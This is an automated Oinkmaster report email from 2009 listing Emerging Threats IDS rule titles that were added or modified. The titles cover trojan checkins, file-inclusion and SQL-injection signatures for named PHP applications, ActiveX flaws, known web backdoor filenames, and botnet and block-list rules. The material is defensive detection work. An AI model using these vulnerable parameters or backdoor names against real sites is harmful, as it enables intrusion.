Message-ID: <20090509220010.BBDB74504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May  9 18:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009300 - ET TROJAN Small.zon checkin (emerging-virus.rules)
 2009301 - ET POLICY Megaupload file download service access (emerging-policy.rules)
 2009302 - ET POLICY Badongo file download service access (emerging-policy.rules)
 2009303 - ET POLICY MediaFire file download service access (emerging-policy.rules)
 2009304 - ET POLICY Gigasize file download service access (emerging-policy.rules)
 2009305 - ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) (emerging-virus.rules)
 2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
 2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
 2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
 2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
 2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
 2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
 2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
 2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
 2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
 2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
 2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
 2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
 2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
 2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
 2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
 2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
 2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
 2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
 2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
 2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)


[///]     Modified active rules:     [///]

 2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)
 2002750 - ET POLICY Reserved IP Space Traffic - Bogon Nets 2 (emerging-policy.rules)
 2009288 - ET WEB PHP Attack Tool Revolt Scanner (emerging-web.rules)
 2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
 2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
 2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
 2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)
 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
 2404000 - ET DROP Known Bot C&C Server Traffic (group 1)  (emerging-botcc.rules)
 2404001 - ET DROP Known Bot C&C Server Traffic (group 2)  (emerging-botcc.rules)
 2404002 - ET DROP Known Bot C&C Server Traffic (group 3)  (emerging-botcc.rules)
 2404003 - ET DROP Known Bot C&C Server Traffic (group 4)  (emerging-botcc.rules)
 2404004 - ET DROP Known Bot C&C Server Traffic (group 5)  (emerging-botcc.rules)
 2404005 - ET DROP Known Bot C&C Server Traffic (group 6)  (emerging-botcc.rules)
 2404006 - ET DROP Known Bot C&C Server Traffic (group 7)  (emerging-botcc.rules)
 2404007 - ET DROP Known Bot C&C Server Traffic (group 8)  (emerging-botcc.rules)
 2404008 - ET DROP Known Bot C&C Server Traffic (group 9)  (emerging-botcc.rules)
 2404009 - ET DROP Known Bot C&C Server Traffic (group 10)  (emerging-botcc.rules)
 2404010 - ET DROP Known Bot C&C Server Traffic (group 11)  (emerging-botcc.rules)
 2404011 - ET DROP Known Bot C&C Server Traffic (group 12)  (emerging-botcc.rules)
 2404012 - ET DROP Known Bot C&C Server Traffic (group 13)  (emerging-botcc.rules)
 2404013 - ET DROP Known Bot C&C Server Traffic (group 14)  (emerging-botcc.rules)
 2404014 - ET DROP Known Bot C&C Server Traffic (group 15)  (emerging-botcc.rules)
 2404015 - ET DROP Known Bot C&C Server Traffic (group 16)  (emerging-botcc.rules)
 2404016 - ET DROP Known Bot C&C Server Traffic (group 17)  (emerging-botcc.rules)
 2404017 - ET DROP Known Bot C&C Server Traffic (group 18)  (emerging-botcc.rules)
 2404018 - ET DROP Known Bot C&C Server Traffic (group 19)  (emerging-botcc.rules)
 2404019 - ET DROP Known Bot C&C Server Traffic (group 20)  (emerging-botcc.rules)
 2404020 - ET DROP Known Bot C&C Server Traffic (group 21)  (emerging-botcc.rules)
 2404021 - ET DROP Known Bot C&C Server Traffic (group 22)  (emerging-botcc.rules)
 2404022 - ET DROP Known Bot C&C Server Traffic (group 23)  (emerging-botcc.rules)
 2404023 - ET DROP Known Bot C&C Server Traffic (group 24)  (emerging-botcc.rules)
 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
 2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules)
 2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules)
 2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules)
 2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules)
 2406036 - ET RBN Known Russian Business Network Monitored Domains (37) (emerging-rbn.rules)
 2406037 - ET RBN Known Russian Business Network Monitored Domains (38) (emerging-rbn.rules)
 2406038 - ET RBN Known Russian Business Network Monitored Domains (39) (emerging-rbn.rules)
 2406039 - ET RBN Known Russian Business Network Monitored Domains (40) (emerging-rbn.rules)
 2406040 - ET RBN Known Russian Business Network Monitored Domains (41) (emerging-rbn.rules)
 2406041 - ET RBN Known Russian Business Network Monitored Domains (42) (emerging-rbn.rules)
 2406042 - ET RBN Known Russian Business Network Monitored Domains (43) (emerging-rbn.rules)
 2406043 - ET RBN Known Russian Business Network Monitored Domains (44) (emerging-rbn.rules)
 2406044 - ET RBN Known Russian Business Network Monitored Domains (45) (emerging-rbn.rules)
 2406045 - ET RBN Known Russian Business Network Monitored Domains (46) (emerging-rbn.rules)
 2406046 - ET RBN Known Russian Business Network Monitored Domains (47) (emerging-rbn.rules)
 2406047 - ET RBN Known Russian Business Network Monitored Domains (48) (emerging-rbn.rules)
 2406048 - ET RBN Known Russian Business Network Monitored Domains (49) (emerging-rbn.rules)
 2406049 - ET RBN Known Russian Business Network Monitored Domains (50) (emerging-rbn.rules)
 2406050 - ET RBN Known Russian Business Network Monitored Domains (51) (emerging-rbn.rules)
 2406051 - ET RBN Known Russian Business Network Monitored Domains (52) (emerging-rbn.rules)
 2406052 - ET RBN Known Russian Business Network Monitored Domains (53) (emerging-rbn.rules)
 2406053 - ET RBN Known Russian Business Network Monitored Domains (54) (emerging-rbn.rules)
 2406054 - ET RBN Known Russian Business Network Monitored Domains (55) (emerging-rbn.rules)
 2406055 - ET RBN Known Russian Business Network Monitored Domains (56) (emerging-rbn.rules)
 2406056 - ET RBN Known Russian Business Network Monitored Domains (57) (emerging-rbn.rules)
 2406057 - ET RBN Known Russian Business Network Monitored Domains (58) (emerging-rbn.rules)
 2406058 - ET RBN Known Russian Business Network Monitored Domains (59) (emerging-rbn.rules)
 2406059 - ET RBN Known Russian Business Network Monitored Domains (60) (emerging-rbn.rules)
 2406060 - ET RBN Known Russian Business Network Monitored Domains (61) (emerging-rbn.rules)
 2406061 - ET RBN Known Russian Business Network Monitored Domains (62) (emerging-rbn.rules)
 2406062 - ET RBN Known Russian Business Network Monitored Domains (63) (emerging-rbn.rules)
 2406063 - ET RBN Known Russian Business Network Monitored Domains (64) (emerging-rbn.rules)
 2406064 - ET RBN Known Russian Business Network Monitored Domains (65) (emerging-rbn.rules)
 2406065 - ET RBN Known Russian Business Network Monitored Domains (66) (emerging-rbn.rules)
 2406066 - ET RBN Known Russian Business Network Monitored Domains (67) (emerging-rbn.rules)
 2406067 - ET RBN Known Russian Business Network Monitored Domains (68) (emerging-rbn.rules)
 2406068 - ET RBN Known Russian Business Network Monitored Domains (69) (emerging-rbn.rules)
 2406069 - ET RBN Known Russian Business Network Monitored Domains (70) (emerging-rbn.rules)
 2406070 - ET RBN Known Russian Business Network Monitored Domains (71) (emerging-rbn.rules)
 2406071 - ET RBN Known Russian Business Network Monitored Domains (72) (emerging-rbn.rules)
 2406072 - ET RBN Known Russian Business Network Monitored Domains (73) (emerging-rbn.rules)
 2406073 - ET RBN Known Russian Business Network Monitored Domains (74) (emerging-rbn.rules)
 2406074 - ET RBN Known Russian Business Network Monitored Domains (75) (emerging-rbn.rules)
 2406075 - ET RBN Known Russian Business Network Monitored Domains (76) (emerging-rbn.rules)
 2406076 - ET RBN Known Russian Business Network Monitored Domains (77) (emerging-rbn.rules)
 2406077 - ET RBN Known Russian Business Network Monitored Domains (78) (emerging-rbn.rules)
 2406078 - ET RBN Known Russian Business Network Monitored Domains (79) (emerging-rbn.rules)
 2406079 - ET RBN Known Russian Business Network Monitored Domains (80) (emerging-rbn.rules)
 2406080 - ET RBN Known Russian Business Network Monitored Domains (81) (emerging-rbn.rules)
 2406081 - ET RBN Known Russian Business Network Monitored Domains (82) (emerging-rbn.rules)
 2406082 - ET RBN Known Russian Business Network Monitored Domains (83) (emerging-rbn.rules)
 2406083 - ET RBN Known Russian Business Network Monitored Domains (84) (emerging-rbn.rules)
 2406084 - ET RBN Known Russian Business Network Monitored Domains (85) (emerging-rbn.rules)
 2406085 - ET RBN Known Russian Business Network Monitored Domains (86) (emerging-rbn.rules)
 2406086 - ET RBN Known Russian Business Network Monitored Domains (87) (emerging-rbn.rules)
 2406087 - ET RBN Known Russian Business Network Monitored Domains (88) (emerging-rbn.rules)
 2406088 - ET RBN Known Russian Business Network Monitored Domains (89) (emerging-rbn.rules)
 2406089 - ET RBN Known Russian Business Network Monitored Domains (90) (emerging-rbn.rules)
 2406090 - ET RBN Known Russian Business Network Monitored Domains (91) (emerging-rbn.rules)
 2406091 - ET RBN Known Russian Business Network Monitored Domains (92) (emerging-rbn.rules)
 2406092 - ET RBN Known Russian Business Network Monitored Domains (93) (emerging-rbn.rules)
 2406093 - ET RBN Known Russian Business Network Monitored Domains (94) (emerging-rbn.rules)
 2406094 - ET RBN Known Russian Business Network Monitored Domains (95) (emerging-rbn.rules)
 2406095 - ET RBN Known Russian Business Network Monitored Domains (96) (emerging-rbn.rules)
 2406096 - ET RBN Known Russian Business Network Monitored Domains (97) (emerging-rbn.rules)
 2406097 - ET RBN Known Russian Business Network Monitored Domains (98) (emerging-rbn.rules)
 2406098 - ET RBN Known Russian Business Network Monitored Domains (99) (emerging-rbn.rules)
 2406099 - ET RBN Known Russian Business Network Monitored Domains (100) (emerging-rbn.rules)
 2406100 - ET RBN Known Russian Business Network Monitored Domains (101) (emerging-rbn.rules)
 2406101 - ET RBN Known Russian Business Network Monitored Domains (102) (emerging-rbn.rules)
 2406102 - ET RBN Known Russian Business Network Monitored Domains (103) (emerging-rbn.rules)
 2406103 - ET RBN Known Russian Business Network Monitored Domains (104) (emerging-rbn.rules)
 2406104 - ET RBN Known Russian Business Network Monitored Domains (105) (emerging-rbn.rules)
 2406105 - ET RBN Known Russian Business Network Monitored Domains (106) (emerging-rbn.rules)
 2406106 - ET RBN Known Russian Business Network Monitored Domains (107) (emerging-rbn.rules)
 2406107 - ET RBN Known Russian Business Network Monitored Domains (108) (emerging-rbn.rules)
 2406108 - ET RBN Known Russian Business Network Monitored Domains (109) (emerging-rbn.rules)
 2406109 - ET RBN Known Russian Business Network Monitored Domains (110) (emerging-rbn.rules)
 2406110 - ET RBN Known Russian Business Network Monitored Domains (111) (emerging-rbn.rules)
 2406111 - ET RBN Known Russian Business Network Monitored Domains (112) (emerging-rbn.rules)
 2406112 - ET RBN Known Russian Business Network Monitored Domains (113) (emerging-rbn.rules)
 2406113 - ET RBN Known Russian Business Network Monitored Domains (114) (emerging-rbn.rules)
 2406114 - ET RBN Known Russian Business Network Monitored Domains (115) (emerging-rbn.rules)
 2406115 - ET RBN Known Russian Business Network Monitored Domains (116) (emerging-rbn.rules)
 2406116 - ET RBN Known Russian Business Network Monitored Domains (117) (emerging-rbn.rules)
 2406117 - ET RBN Known Russian Business Network Monitored Domains (118) (emerging-rbn.rules)
 2406118 - ET RBN Known Russian Business Network Monitored Domains (119) (emerging-rbn.rules)
 2406119 - ET RBN Known Russian Business Network Monitored Domains (120) (emerging-rbn.rules)
 2406120 - ET RBN Known Russian Business Network Monitored Domains (121) (emerging-rbn.rules)
 2406121 - ET RBN Known Russian Business Network Monitored Domains (122) (emerging-rbn.rules)
 2406122 - ET RBN Known Russian Business Network Monitored Domains (123) (emerging-rbn.rules)
 2406123 - ET RBN Known Russian Business Network Monitored Domains (124) (emerging-rbn.rules)
 2406124 - ET RBN Known Russian Business Network Monitored Domains (125) (emerging-rbn.rules)
 2406125 - ET RBN Known Russian Business Network Monitored Domains (126) (emerging-rbn.rules)
 2406126 - ET RBN Known Russian Business Network Monitored Domains (127) (emerging-rbn.rules)
 2406127 - ET RBN Known Russian Business Network Monitored Domains (128) (emerging-rbn.rules)
 2406128 - ET RBN Known Russian Business Network Monitored Domains (129) (emerging-rbn.rules)
 2406129 - ET RBN Known Russian Business Network Monitored Domains (130) (emerging-rbn.rules)
 2406130 - ET RBN Known Russian Business Network Monitored Domains (131) (emerging-rbn.rules)
 2406131 - ET RBN Known Russian Business Network Monitored Domains (132) (emerging-rbn.rules)
 2406132 - ET RBN Known Russian Business Network Monitored Domains (133) (emerging-rbn.rules)
 2406133 - ET RBN Known Russian Business Network Monitored Domains (134) (emerging-rbn.rules)
 2406134 - ET RBN Known Russian Business Network Monitored Domains (135) (emerging-rbn.rules)
 2406135 - ET RBN Known Russian Business Network Monitored Domains (136) (emerging-rbn.rules)
 2406136 - ET RBN Known Russian Business Network Monitored Domains (137) (emerging-rbn.rules)
 2406137 - ET RBN Known Russian Business Network Monitored Domains (138) (emerging-rbn.rules)
 2406138 - ET RBN Known Russian Business Network Monitored Domains (139) (emerging-rbn.rules)
 2406139 - ET RBN Known Russian Business Network Monitored Domains (140) (emerging-rbn.rules)
 2406140 - ET RBN Known Russian Business Network Monitored Domains (141) (emerging-rbn.rules)
 2406141 - ET RBN Known Russian Business Network Monitored Domains (142) (emerging-rbn.rules)
 2406142 - ET RBN Known Russian Business Network Monitored Domains (143) (emerging-rbn.rules)
 2406143 - ET RBN Known Russian Business Network Monitored Domains (144) (emerging-rbn.rules)
 2406144 - ET RBN Known Russian Business Network Monitored Domains (145) (emerging-rbn.rules)
 2406145 - ET RBN Known Russian Business Network Monitored Domains (146) (emerging-rbn.rules)
 2406146 - ET RBN Known Russian Business Network Monitored Domains (147) (emerging-rbn.rules)
 2406147 - ET RBN Known Russian Business Network Monitored Domains (148) (emerging-rbn.rules)
 2406148 - ET RBN Known Russian Business Network Monitored Domains (149) (emerging-rbn.rules)
 2406149 - ET RBN Known Russian Business Network Monitored Domains (150) (emerging-rbn.rules)
 2406150 - ET RBN Known Russian Business Network Monitored Domains (151) (emerging-rbn.rules)
 2406151 - ET RBN Known Russian Business Network Monitored Domains (152) (emerging-rbn.rules)
 2406152 - ET RBN Known Russian Business Network Monitored Domains (153) (emerging-rbn.rules)
 2406153 - ET RBN Known Russian Business Network Monitored Domains (154) (emerging-rbn.rules)
 2406154 - ET RBN Known Russian Business Network Monitored Domains (155) (emerging-rbn.rules)
 2406155 - ET RBN Known Russian Business Network Monitored Domains (156) (emerging-rbn.rules)
 2406156 - ET RBN Known Russian Business Network Monitored Domains (157) (emerging-rbn.rules)
 2406157 - ET RBN Known Russian Business Network Monitored Domains (158) (emerging-rbn.rules)
 2406158 - ET RBN Known Russian Business Network Monitored Domains (159) (emerging-rbn.rules)
 2406159 - ET RBN Known Russian Business Network Monitored Domains (160) (emerging-rbn.rules)
 2406160 - ET RBN Known Russian Business Network Monitored Domains (161) (emerging-rbn.rules)
 2406161 - ET RBN Known Russian Business Network Monitored Domains (162) (emerging-rbn.rules)
 2406162 - ET RBN Known Russian Business Network Monitored Domains (163) (emerging-rbn.rules)
 2406163 - ET RBN Known Russian Business Network Monitored Domains (164) (emerging-rbn.rules)
 2406164 - ET RBN Known Russian Business Network Monitored Domains (165) (emerging-rbn.rules)
 2406165 - ET RBN Known Russian Business Network Monitored Domains (166) (emerging-rbn.rules)
 2406166 - ET RBN Known Russian Business Network Monitored Domains (167) (emerging-rbn.rules)
 2406167 - ET RBN Known Russian Business Network Monitored Domains (168) (emerging-rbn.rules)
 2406168 - ET RBN Known Russian Business Network Monitored Domains (169) (emerging-rbn.rules)
 2406169 - ET RBN Known Russian Business Network Monitored Domains (170) (emerging-rbn.rules)
 2406170 - ET RBN Known Russian Business Network Monitored Domains (171) (emerging-rbn.rules)
 2406171 - ET RBN Known Russian Business Network Monitored Domains (172) (emerging-rbn.rules)
 2406172 - ET RBN Known Russian Business Network Monitored Domains (173) (emerging-rbn.rules)
 2406173 - ET RBN Known Russian Business Network Monitored Domains (174) (emerging-rbn.rules)
 2406174 - ET RBN Known Russian Business Network Monitored Domains (175) (emerging-rbn.rules)
 2406175 - ET RBN Known Russian Business Network Monitored Domains (176) (emerging-rbn.rules)
 2406176 - ET RBN Known Russian Business Network Monitored Domains (177) (emerging-rbn.rules)
 2406177 - ET RBN Known Russian Business Network Monitored Domains (178) (emerging-rbn.rules)
 2406178 - ET RBN Known Russian Business Network Monitored Domains (179) (emerging-rbn.rules)
 2406179 - ET RBN Known Russian Business Network Monitored Domains (180) (emerging-rbn.rules)
 2406180 - ET RBN Known Russian Business Network Monitored Domains (181) (emerging-rbn.rules)
 2406181 - ET RBN Known Russian Business Network Monitored Domains (182) (emerging-rbn.rules)
 2406182 - ET RBN Known Russian Business Network Monitored Domains (183) (emerging-rbn.rules)
 2406183 - ET RBN Known Russian Business Network Monitored Domains (184) (emerging-rbn.rules)
 2406184 - ET RBN Known Russian Business Network Monitored Domains (185) (emerging-rbn.rules)
 2406185 - ET RBN Known Russian Business Network Monitored Domains (186) (emerging-rbn.rules)
 2406186 - ET RBN Known Russian Business Network Monitored Domains (187) (emerging-rbn.rules)
 2406187 - ET RBN Known Russian Business Network Monitored Domains (188) (emerging-rbn.rules)
 2406188 - ET RBN Known Russian Business Network Monitored Domains (189) (emerging-rbn.rules)
 2406189 - ET RBN Known Russian Business Network Monitored Domains (190) (emerging-rbn.rules)
 2406190 - ET RBN Known Russian Business Network Monitored Domains (191) (emerging-rbn.rules)
 2406191 - ET RBN Known Russian Business Network Monitored Domains (192) (emerging-rbn.rules)
 2406192 - ET RBN Known Russian Business Network Monitored Domains (193) (emerging-rbn.rules)
 2406193 - ET RBN Known Russian Business Network Monitored Domains (194) (emerging-rbn.rules)
 2406194 - ET RBN Known Russian Business Network Monitored Domains (195) (emerging-rbn.rules)
 2406195 - ET RBN Known Russian Business Network Monitored Domains (196) (emerging-rbn.rules)
 2406196 - ET RBN Known Russian Business Network Monitored Domains (197) (emerging-rbn.rules)
 2406197 - ET RBN Known Russian Business Network Monitored Domains (198) (emerging-rbn.rules)
 2406198 - ET RBN Known Russian Business Network Monitored Domains (199) (emerging-rbn.rules)
 2406199 - ET RBN Known Russian Business Network Monitored Domains (200) (emerging-rbn.rules)
